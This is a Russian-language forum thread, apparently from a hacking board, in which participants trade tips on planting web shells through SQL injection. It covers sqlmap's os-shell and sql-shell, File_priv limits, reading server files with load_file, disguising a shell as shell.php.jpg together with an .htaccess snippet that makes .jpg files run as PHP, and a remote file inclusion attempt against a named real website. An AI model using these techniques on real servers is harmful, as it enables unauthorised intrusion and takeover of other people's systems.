shell.php.jpg

Неееееееееее, я ленюсь!

 

ну вот -os shell зальется у тебя или нет?))

 

нет, я ж путь не знаю... поудаляй свои посты, и еси чё в ЛС

 

Я не профи конечно , но os_shell заливает файл аплоидер на сервер, через который ты можешь заливать файлы или сразу заливать шел и если поверёт, не всегда конечно попадаешь в шел БД, где можешь делать запросы.
sql-shell ты сразу попадаешь в шел бд

 

Да, ты прав!
Но в его случае File_priv=N, я уже проверил!

 

Тогда можно надеется что будет возможность прочитать файлы, очень далеко не всегда такое есть при файл прив Н

 

Покажи.

 

https://rdot.org/forum/showthread.php?t=741

 

Мне интересно по первому посту: где вообще shell.php.jpg может исполнится как скрипт? При каких-таких настройках.

 

когда автоматом подставляется .php

 

https://rdot.org/forum/showpost.php?p=1142&postcount=5

 

Это из категории file.php.giflalala, file.php.lalalajpg -- кривые регулярки и mod_mime ?

А такое бывает? Зачем тогда как jpg загружать?

 

Так, вроде jpg можно интерпретировать как скрипт! .htaccess

Code:

RemoveHandler .jpg
AddType application/x-httpd-php .jpg

 

Подскажите как определить правельность пути /home/admin/sites/
Нашел скулю.Нашел полный путь.Пытаюсь залить шелл пишет ошибку 403

 

load_file('/home/u232323/public_html/index.php') если уж нет доверия к логам. 403 доступ запрещён , waf есть?

 

Ну да, но тогда просто shell.jpg залить можно.

 

А можете помочь в понимании этой уязвимости?)
http://www.prodisney.ru/index.php?page=http://site/shell.txt?
Отображает код шелла.
А в таком виде
http://www.prodisney.ru/index.php?page=http://site/shell.php
Отображает мой хостинг.

 

Yes master!

 

Там нет уязвимости, содержимое просто через iframe отображается, насколько я понял.

 

если у юзера sql нет FILE PRIVILEGES то писать ничего на сервер не получится через инжект
если нет STACKED QUERIES, а в сетапе PHP-MYSQL их обычно нет, то кроме селектов из БД мало что можно придумать